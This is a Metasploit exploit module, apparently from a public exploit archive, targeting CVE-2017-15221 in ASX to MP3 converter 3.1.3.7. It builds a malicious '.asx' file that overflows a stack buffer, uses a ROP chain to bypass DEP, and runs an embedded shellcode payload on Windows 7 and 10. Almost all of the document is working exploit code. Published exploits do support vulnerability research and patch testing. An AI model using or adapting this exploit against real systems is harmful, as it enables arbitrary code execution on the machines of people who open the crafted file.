ASX to MP3 converter 3.1.3.7 – ‘.asx’ Local Stack Overflow (Metasploit, DEP Bypass)
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info={})
super(update_info(info,
'Name' => "ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP)",
'Description' => %q{
This module exploits a stack buffer overflow in ASX to MP3 converter 3.1.3.7.
By constructing a specially crafted ASX file and attempting to convert it to an MP3 file in the
application, a buffer is overwritten, which allows for running shellcode.
Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, x64-based PC
Microsoft Windows 10 Pro, 10.0.18362 N/A Build 18362, x64-based PC
},
'License' => MSF_LICENSE,
'Author' =>
[
'Maxim Guslyaev',
],
'References' =>
[
[ 'CVE', '2017-15221' ],
[ 'EDB', '47468' ]
],
'Platform' => 'win',
'Targets' =>
[
[
'Windows 7 Enterprise/10 Pro',
{
'Ret' => 0x1002D038
}
]
],
'Payload' =>
{
'BadChars' => "\x00\x09\x0a"
},
'Privileged' => false,
'DisclosureDate' => "Oct 06 2019",
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [true, 'The malicious file name', 'music.asx'])
])
end
def exploit
buf = "http://"
buf += "A" * 17417 + [target.ret].pack("V") + "CCCC"
buf += [0x10047F4D].pack("V")
buf += [0x11111111].pack("V")
buf += [0x10029B8C].pack("V")
buf += [0x1002D493].pack("V")
buf += [0xEEEEFEEF].pack("V")
buf += [0x10047F4D].pack("V")
buf += [0x41414141].pack("V")
buf += [0x1002fade].pack("V")
buf += [0x1004f060].pack("V")
buf += [0x1003239f].pack("V")
buf += [0x10040754].pack("V")
buf += [0x41414141].pack("V")
buf += [0x41414141].pack("V")
buf += [0x1004d881].pack("V")
buf += [0x1003b34d].pack("V")
buf += [0x1003b34d].pack("V")
buf += [0x1003b34d].pack("V")
buf += [0x1003b34d].pack("V")
buf += [0x1003b34d].pack("V")
buf += [0x1003b34d].pack("V")
buf += [0x1003b34d].pack("V")
buf += [0x1003b34d].pack("V")
buf += [0x1003b34d].pack("V")
buf += [0x1003b34d].pack("V")
buf += [0x1003b34d].pack("V")
buf += [0x1003b34d].pack("V")
buf += [0x1003b34d].pack("V")
buf += [0x10034735].pack("V")
buf += [0x10031c6c].pack("V")
buf += [0x10012316].pack("V")
buf += [0x1002ca22].pack("V")
buf += [0xFFFFFFFF].pack("V")
buf += [0x10031ebe].pack("V")
buf += [0x10031ebe].pack("V")
buf += [0x1002a5b7].pack("V")
buf += [0x1002a5b7].pack("V")
buf += [0x1002a5b7].pack("V")
buf += [0x1002a5b7].pack("V")
buf += [0x1002a5b7].pack("V")
buf += [0x1002a5b7].pack("V")
buf += [0x1002e346].pack("V")
buf += [0x1002D038].pack("V")
buf += [0x1002E516].pack("V")
buf += [0xA4E2F275].pack("V")
buf += [0x1003efe2].pack("V")
buf += [0x10040ce5].pack("V")
buf += "\x90" * 4
buf += [0x1003df73].pack("V")
buf += "\x90" * 20
buf += payload.encoded
file_create(buf)
end
end